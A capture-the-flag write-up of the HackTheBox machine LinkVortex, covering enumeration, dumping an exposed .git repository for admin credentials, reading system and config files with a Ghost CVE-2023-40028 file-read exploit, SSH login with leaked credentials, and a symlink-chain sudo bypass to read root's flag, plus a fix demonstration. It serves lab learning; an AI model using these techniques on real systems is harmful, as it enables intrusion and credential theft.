HackTheBox: LinkVortex

Table of Contents

[TOC]

Topic

Lab

Initial Enumeration

● Start Machine: 10.10.11.47

┌──(chw㉿CHW)-[~]
└─$ nmap -sC -sV -Pn 10.10.11.47 
Nmap scan report for 10.10.11.47
Host is up (0.24s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:f8:b9:68:c8:eb:57:0f:cb:0b:47:b9:86:50:83:eb (ECDSA)
|_  256 a2:ea:6e:e1:b6:d7:e7:c5:86:69:ce:ba:05:9e:38:13 (ED25519)
80/tcp open  http    Apache httpd
|_http-title: Did not follow redirect to http://linkvortex.htb/
|_http-server-header: Apache
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 241.69 seconds

SSH, HTTP

Edit /etc/hosts

┌──(chw㉿CHW)-[~]
└─$ cat /etc/hosts            
10.10.11.47     linkvortex.htb    

Browse to http://linkvortex.htb/

There is a Sign up link at the bottom of the page, but it does nothing.

view-source shows nothing obviously vulnerable

  • ffuf path
┌──(chw㉿CHW)-[~]
└─$ ffuf -t 50 -r -w /usr/share/dirb/wordlists/common.txt -u http://linkvortex.htb/FUZZ -e .git,.php,.bak,.zip 

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________
...
                        [Status: 200, Size: 12148, Words: 2590, Lines: 308, Duration: 673ms]
about                   [Status: 200, Size: 8284, Words: 1296, Lines: 162, Duration: 557ms]
About                   [Status: 200, Size: 8284, Words: 1296, Lines: 162, Duration: 511ms]
favicon.ico             [Status: 200, Size: 15406, Words: 43, Lines: 2, Duration: 498ms]
favicon.ico.php         [Status: 200, Size: 15406, Words: 43, Lines: 2, Duration: 671ms]
favicon.ico.zip         [Status: 200, Size: 15406, Words: 43, Lines: 2, Duration: 671ms]
favicon.ico.bak         [Status: 200, Size: 15406, Words: 43, Lines: 2, Duration: 672ms]
favicon.ico.git         [Status: 200, Size: 15406, Words: 43, Lines: 2, Duration: 672ms]
feed                    [Status: 200, Size: 26682, Words: 3078, Lines: 1, Duration: 829ms]
LICENSE                 [Status: 200, Size: 1065, Words: 149, Lines: 23, Duration: 525ms]
private                 [Status: 200, Size: 12148, Words: 2590, Lines: 308, Duration: 955ms]
robots.txt              [Status: 200, Size: 121, Words: 7, Lines: 7, Duration: 317ms]
rss                     [Status: 200, Size: 26682, Words: 3078, Lines: 1, Duration: 879ms]
RSS                     [Status: 200, Size: 26682, Words: 3078, Lines: 1, Duration: 565ms]
server-status           [Status: 403, Size: 199, Words: 14, Lines: 8, Duration: 202ms]
sitemap.xml             [Status: 200, Size: 527, Words: 6, Lines: 1, Duration: 766ms]

Solution

1. Searchsploit


CMS: Ghost 5.58

┌──(chw㉿CHW)-[~]
└─$ searchsploit ghost 5.58
--------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                 |  Path
--------------------------------------------------------------------------------------------------------------- ---------------------------------
Ghostscript < 8.64 - 'gdevpdtb.c' Local Buffer Overflow                                                        | multiple/local/10326.txt
--------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

Not much help.

Ghost v5.58 CVE exploit: CVE-2023-40028, but it requires a username and password first.

While looking up the Ghost default login, I saw that there may be a subdomain [How do I login to Ghost Admin?]

2. ffuf Subdomain

┌──(chw㉿CHW)-[~]
└─$ ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.linkvortex.htb" -u http://linkvortex.htb -c -mc 200


        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://linkvortex.htb
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
 :: Header           : Host: FUZZ.linkvortex.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200
________________________________________________

dev                     [Status: 200, Size: 2538, Words: 670, Lines: 116, Duration: 1043ms]

Edit /etc/hosts

┌──(chw㉿CHW)-[~]
└─$ cat /etc/hosts            
10.10.11.47     linkvortex.htb dev.linkvortex.htb   

Browse to http://dev.linkvortex.htb/

Half-built sites are usually the more interesting ones 👷🏻‍♂️

3. dev.linkvortex.htb

  • dirsearch
┌──(chw㉿CHW)-[~]
└─$ dirsearch -u http://dev.linkvortex.htb/ -t 50
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3                                                                                                                    
 (_||| _) (/_(_|| (_| )                                                                                                                             
                                                                                                                                                    
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 50 | Wordlist size: 11460

Output File: /home/chw/reports/http_dev.linkvortex.htb/__25-04-11_07-36-50.txt

Target: http://dev.linkvortex.htb/

[07:36:50] Starting:                                                                                                                                
[07:36:58] 301 -  239B  - /.git  ->  http://dev.linkvortex.htb/.git/        
[07:36:58] 200 -   73B  - /.git/description                                 
[07:36:58] 200 -  201B  - /.git/config
[07:36:58] 200 -  557B  - /.git/                                            
[07:36:59] 200 -   41B  - /.git/HEAD                                        
[07:36:59] 200 -  620B  - /.git/hooks/                                      
[07:36:59] 200 -  401B  - /.git/logs/                                       
[07:36:59] 200 -  240B  - /.git/info/exclude
[07:36:59] 200 -  175B  - /.git/logs/HEAD                                   
[07:36:59] 200 -  402B  - /.git/info/
[07:36:59] 200 -  393B  - /.git/refs/
...

Interesting indeed.

Browse to http://dev.linkvortex.htb/.git/

4. Gitdumper

┌──(chw㉿CHW)-[~/Tools/git-dumper]
└─$ python3 git_dumper.py http://dev.linkvortex.htb/.git/ HTB
/home/chw/Tools/git-dumper/git_dumper.py:409: SyntaxWarning: invalid escape sequence '\g'
  modified_content = re.sub(UNSAFE, '# \g<0>', content, flags=re.IGNORECASE)
[-] Testing http://dev.linkvortex.htb/.git/HEAD [200]
[-] Testing http://dev.linkvortex.htb/.git/ [200]
[-] Fetching .git recursively
[-] Fetching http://dev.linkvortex.htb/.gitignore [404]
[-] Fetching http://dev.linkvortex.htb/.git/ [200]
[-] http://dev.linkvortex.htb/.gitignore responded with status code 404
[-] Fetching http://dev.linkvortex.htb/.git/refs/ [200]
...
[-] Sanitizing .git/config
[-] Running git checkout .
Updated 5596 paths from the index

The goal is to log in to the CMS, so grep the git-dump folder for admin, password, pwd

┌──(chw㉿CHW)-[~/Tools/git-dumper/HTB]
└─$ grep -riE 'admin|password|pwd' . 
...

admin@linkvortex.htb : OctopiFociPilfer45

Brute-forcing the Blowfish hash would take forever.

5. Log in to the CMS

Log in to Ghost with admin@linkvortex.htb : OctopiFociPilfer45

6. Exploit

Try the CVE exploit found earlier for arbitrary file read.

┌──(chw㉿CHW)-[~/Tools/CVE-exploit]
└─$ git clone https://github.com/0xDTC/Ghost-5.58-Arbitrary-File-Read-CVE-2023-40028.git 
┌──(chw㉿CHW)-[~/Tools/CVE-exploit/CVE-2023-40028_Ghost-5.58_Arbitrary_File_Read]
└─$ ./CVE-2023-40028 -u admin@linkvortex.htb -p OctopiFociPilfer45 -h http://linkvortex.htb/
WELCOME TO THE CVE-2023-40028 SHELL
Enter the file path to read (or type 'exit' to quit): /etc/passwd
File content:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
node:x:1000:1000::/home/node:/bin/bash
Enter the file path to read (or type 'exit' to quit): 

User: node

Try to read node's SSH id_rsa

Enter the file path to read (or type 'exit' to quit): /home/node/.ssh/id_rsa
File content:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Error</title>
</head>
<body>
<pre>Not Found</pre>
</body>
</html>

Failed.

/etc/ssh/ssh_config and /root/.ssh/id_rsa also fail.

Go back and check the leaked git content.
In the Dockerfile, config.production.json is copied to /var/lib/ghost/config.production.json.

┌──(chw㉿CHW)-[~/Tools/git-dumper/HTB]
└─$ cat Dockerfile.ghost 
FROM ghost:5.58.0

# Copy the config
COPY config.production.json /var/lib/ghost/config.production.json

So try reading /var/lib/ghost/config.production.json with the exploit.

Enter the file path to read (or type 'exit' to quit): /var/lib/ghost/config.production.json
File content:
{
  "url": "http://localhost:2368",
  "server": {
    "port": 2368,
    "host": "::"
  },
  "mail": {
    "transport": "Direct"
  },
  "logging": {
    "transports": ["stdout"]
  },
  "process": "systemd",
  "paths": {
    "contentPath": "/var/lib/ghost/content"
  },
  "spam": {
    "user_login": {
        "minWait": 1,
        "maxWait": 604800000,
        "freeRetries": 5000
    }
  },
  "mail": {
     "transport": "SMTP",
     "options": {
      "service": "Google",
      "host": "linkvortex.htb",
      "port": 587,
      "auth": {
        "user": "bob@linkvortex.htb",
        "pass": "fibber-talented-worth"
        }
      }
    }
}

bob@linkvortex.htb : fibber-talented-worth

7. Login SSH

┌──(chw㉿CHW)-[~]
└─$ ssh bob@linkvortex.htb            
The authenticity of host 'linkvortex.htb (10.10.11.47)' can't be established.
ED25519 key fingerprint is SHA256:vrkQDvTUj3pAJVT+1luldO6EvxgySHoV6DPCcat0WkI.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:7: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
...

Last login: Fri Apr 11 11:53:09 2025 from 10.10.14.136
bob@linkvortex:~$ whoami
bob
bob@linkvortex:~$ hostname
linkvortex
bob@linkvortex:~$ pwd
/home/bob

✅ Get User Flag

The user flag is in /home/bob.

Privilege Escalation

8. sudo -l

bob@linkvortex:~$ sudo -l
Matching Defaults entries for bob on linkvortex:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty,
    env_keep+=CHECK_CONTENT

User bob may run the following commands on linkvortex:
    (ALL) NOPASSWD: /usr/bin/bash /opt/ghost/clean_symlink.sh *.png

/usr/bin/bash /opt/ghost/clean_symlink.sh *.png

9. /opt/ghost/clean_symlink.sh

Check whether /opt/ghost/clean_symlink.sh is writable.

bob@linkvortex:~$ ls -al /opt/ghost/clean_symlink.sh
-rwxr--r-- 1 root root 745 Nov  1 08:46 /opt/ghost/clean_symlink.sh

NO

Look at the script contents:

bob@linkvortex:~$ cat /opt/ghost/clean_symlink.sh
#!/bin/bash

QUAR_DIR="/var/quarantined"

if [ -z $CHECK_CONTENT ];then
  CHECK_CONTENT=false
fi

LINK=$1

if ! [[ "$LINK" =~ \.png$ ]]; then
  /usr/bin/echo "! First argument must be a png file !"
  exit 2
fi

if /usr/bin/sudo /usr/bin/test -L $LINK;then
  LINK_NAME=$(/usr/bin/basename $LINK)
  LINK_TARGET=$(/usr/bin/readlink $LINK)
  if /usr/bin/echo "$LINK_TARGET" | /usr/bin/grep -Eq '(etc|root)';then
    /usr/bin/echo "! Trying to read critical files, removing link [ $LINK ] !"
    /usr/bin/unlink $LINK
  else
    /usr/bin/echo "Link found [ $LINK ] , moving it to quarantine"
    /usr/bin/mv $LINK $QUAR_DIR/
    if $CHECK_CONTENT;then
      /usr/bin/echo "Content:"
      /usr/bin/cat $QUAR_DIR/$LINK_NAME 2>/dev/null
    fi
  fi
fi

If CHECK_CONTENT=true (preserved via env_keep+=CHECK_CONTENT), the script cats the quarantined file's contents,
but the link target must not contain etc or root.

Symbolic links can be used to try to bypass this.

bob@linkvortex:~$ ln -s /root/root.txt chw.txt
bob@linkvortex:~$ ln -s /home/bob/chw.txt chw_flag.png 
bob@linkvortex:~$ ls
chw.txt  chw_flag.png  user.txt
bob@linkvortex:~$ sudo CHECK_CONTENT=true /usr/bin/bash /opt/ghost/clean_symlink.sh /home/bob/chw_flag.png
Link found [ /home/bob/chw_flag.png ] , moving it to quarantine
Content:
6d3552a7****************

  1. Create a symlink chw.txt pointing to /root/root.txt
  2. Create another symlink chw_flag.png pointing to chw.txt,
     which indirectly points to /root/root.txt
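Why the chain works, shown side by side with the fix. This is an added example, not the box's /opt/ghost/clean_symlink.sh or the author's commands: it rebuilds the script's one-hop `readlink` plus substring deny-list as `weak_check`, and puts a canonicalising `readlink -f` plus allow-list check next to it as `strong_check`. The fixture (a temporary directory with a `root/root.txt` stand-in, a `content/` directory and the two symlink chains) is constructed here so the script runs offline without touching real system paths.

```shell
#!/bin/bash
# Added example, not the box's /opt/ghost/clean_symlink.sh: it rebuilds the
# one-hop readlink check from that script next to a canonicalising check,
# using a constructed symlink chain in a temporary directory.
set -u

# Construct the fixture: <work>/link.png -> mid.txt -> root/root.txt (a stand-in
# for /root/root.txt) plus a legitimate <work>/good.png -> content/img.png.
# Prints the working directory so callers can build paths from it.
setup_fixture() {
  local work
  work=$(mktemp -d)
  mkdir -p "$work/root" "$work/content"
  echo "constructed-secret" > "$work/root/root.txt"
  echo "constructed-image" > "$work/content/img.png"
  ( cd "$work" && ln -s root/root.txt mid.txt && ln -s mid.txt link.png \
               && ln -s content/img.png good.png )
  printf '%s\n' "$work"
}

# Same logic as the vulnerable script: inspect only the immediate link text
# and deny on a substring match, so "mid.txt" passes even though the chain
# ends at root/root.txt.
weak_check() {
  local target
  target=$(readlink -- "$1")
  if printf '%s\n' "$target" | grep -Eq '(etc|root)'; then
    echo blocked
  else
    echo allowed
  fi
}

# Hardened: resolve every hop with readlink -f, then allow only targets whose
# canonical path sits under an explicit content directory ($2). Both sides are
# canonicalised so a symlinked /tmp does not break the prefix comparison.
strong_check() {
  local resolved allowed_root
  allowed_root=$(readlink -f -- "$2") || { echo blocked; return; }
  resolved=$(readlink -f -- "$1") || { echo blocked; return; }
  case "$resolved" in
    "$allowed_root"/*) echo allowed ;;
    *) echo blocked ;;
  esac
}

# Stand-alone run: print both verdicts for the chained link and the good link.
W=$(setup_fixture)
echo "chain  weak=$(weak_check "$W/link.png")  strong=$(strong_check "$W/link.png" "$W/content")"
echo "good   weak=$(weak_check "$W/good.png")  strong=$(strong_check "$W/good.png" "$W/content")"
rm -rf "$W"
```

The deny-list on the unresolved link text is the bug: `readlink` without `-f` returns only the next hop, so any intermediate link whose name avoids the words `etc` and `root` passes, and the later `cat` runs as root on whatever the chain finally resolves to. Canonicalising with `readlink -f` and comparing against an allowed prefix removes that gap, and dropping `env_keep+=CHECK_CONTENT` from sudoers removes the caller's control over whether the contents are printed at all.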

✅ Get Root FLAG

tags: HTB Web CTF